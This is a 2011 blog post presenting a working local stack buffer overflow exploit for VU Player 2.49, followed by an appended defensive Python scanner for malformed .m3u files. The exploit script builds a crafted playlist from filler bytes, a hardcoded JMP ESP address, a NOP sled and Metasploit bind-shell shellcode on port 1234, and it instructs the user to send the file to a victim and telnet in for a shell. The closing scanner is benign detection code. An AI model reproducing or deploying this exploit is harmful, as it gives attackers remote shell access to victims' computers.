Wednesday, September 28, 2011

VU Player stack buffer overflow Local Exploit

This is a VU Player stack buffer overflow exploit. It is a local exploit.
When you run this exploit, a malformed .m3u file will be generated.
Change the shellcode according to your purpose.
The shellcode I have added is a bad-character-free windows/shell/bind_tcp payload generated from the Metasploit Framework.
If you use this shellcode, after the victim opens the malformed .m3u you just have to telnet to the victim on port 1234 to get a shell.

I have submitted the code to the injector vulnerability database.
You can also find it at http://1337day.com/exploits/16741

# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Email: debasishm89@gmail.com
# Software Link: http://www.brothersoft.com/vuplayer-62979.html
# Category: Local
# Tested on: Windows XP SP2.


#!/usr/bin/python
from struct import pack
print "######################################################"
print "##   VU Player Local BO Exploit                     ##"
print "##   http://www.brothersoft.com/vuplayer-62979.html ##"
print "##   Author :: Debasish Mandal                      ##"
print "##   Email : debasishm89@gmail.com                  ##"
print "##   http://www.facebook.com/raza.whitehat          ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")
f = open('victim.m3u','wb')  # binary mode so newline translation cannot alter the payload
junk = "A"*1012              # filler up to the saved return address
eip = pack('<L',0x77D7754A)  # JMP ESP @ USER32.dll (address specific to the tested Windows XP SP2 build)
nop = "\x90" *10    # NOP sled [To make the exploit smooth]

#Shell Code Starts Here
#List of bad characters: \x00  \x09   \x0a  \x1a
#Generated from Metasploit Framework
#Name : windows/shell/bind_tcp
#LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
"\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0"
"\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12"
"\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d"
"\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99"
"\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73"
"\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d"
"\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a"
"\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7"
"\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58"
"\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2"
"\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85"
"\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb"
"\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4"
"\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a"
"\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5"
"\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b"
"\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e"
"\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b"
"\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d"
"\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d"
"\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67")
payload = (junk+eip+nop+shellcode)
print "[*]Writing payload to the file victim.m3u"
f.write(payload)
f.close()
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"


# 1337day.com [2011-08-22]
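As an added defensive example (not part of the original post or the exploit above), a small Python 3 scanner that checks a playlist file for the structural tells a crafted .m3u like the one generated above shows: an entry far longer than any real path, a run of 0x90 bytes, and a high share of non-printable bytes. The thresholds and both sample playlists are constructed for this example; the malformed sample mirrors the generator's layout (filler, four-byte address slot, NOP sled, opaque bytes) using placeholder bytes instead of the post's shellcode.

```python
import re
import sys

# Heuristic thresholds (assumed values chosen for this example).
MAX_ENTRY_LEN = 512        # no legitimate playlist path comes close to 1 KiB
NOP_SLED_MIN = 8           # run of 0x90 bytes long enough to look like a sled
NONPRINT_RATIO = 0.10      # share of non-printable bytes tolerated per entry


def scan_m3u(data: bytes) -> list:
    """Return (line_no, reason) findings for a playlist given as raw bytes."""
    findings = []
    for no, line in enumerate(data.splitlines(), 1):
        if not line or line.startswith(b"#"):
            continue  # blank line or #EXTM3U / #EXTINF directive
        if len(line) > MAX_ENTRY_LEN:
            findings.append((no, "entry length %d exceeds %d" % (len(line), MAX_ENTRY_LEN)))
        sled = re.search(rb"\x90{%d,}" % NOP_SLED_MIN, line)
        if sled:
            findings.append((no, "NOP sled of %d bytes" % len(sled.group())))
        nonprint = sum(1 for b in line if b < 0x20 or b > 0x7e)
        if nonprint / len(line) > NONPRINT_RATIO:
            findings.append((no, "%.0f%% non-printable bytes" % (100.0 * nonprint / len(line))))
    return findings


# Constructed sample data: a normal playlist and one laid out like the crafted file.
BENIGN = (b"#EXTM3U\n#EXTINF:123,Artist - Title\n"
          b"C:\\Music\\track01.mp3\nhttp://example.invalid/stream.mp3\n")
MALFORMED = (b"A" * 1012            # filler up to the saved return address
             + b"BBBB"              # placeholder for the 4-byte return address
             + b"\x90" * 10         # NOP sled
             + bytes(range(0x80, 0xC0)) * 4)  # placeholder for opaque payload bytes


if __name__ == "__main__":
    # Usage: python scan_m3u.py playlist.m3u [...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for no, reason in scan_m3u(fh.read()):
                print("%s:%d: %s" % (path, no, reason))
```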